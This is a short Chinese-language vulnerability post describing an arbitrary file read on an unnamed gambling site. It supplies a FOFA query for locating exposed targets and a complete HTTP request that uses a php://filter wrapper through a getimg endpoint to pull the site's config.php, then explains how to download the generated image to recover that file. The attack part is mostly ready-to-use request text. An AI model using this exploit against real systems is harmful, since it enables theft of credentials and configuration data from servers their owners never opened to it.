某菠菜站点任意文件读取

0x01 漏洞描述：

        某菠菜站点存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

0x02 搜索语句：

Fofa："Public/Js/Mobile" && country="CN"

0x03 漏洞复现：

该漏洞通过getimg接口将读取文件写入到图片中，然后通过保存图片方式能读取到写入的文件

首先进行文件读取

GET /Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ****
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

 

访问图片地址进行下载

https://your-ip/public/gamelist/1993.jpg

下载后打开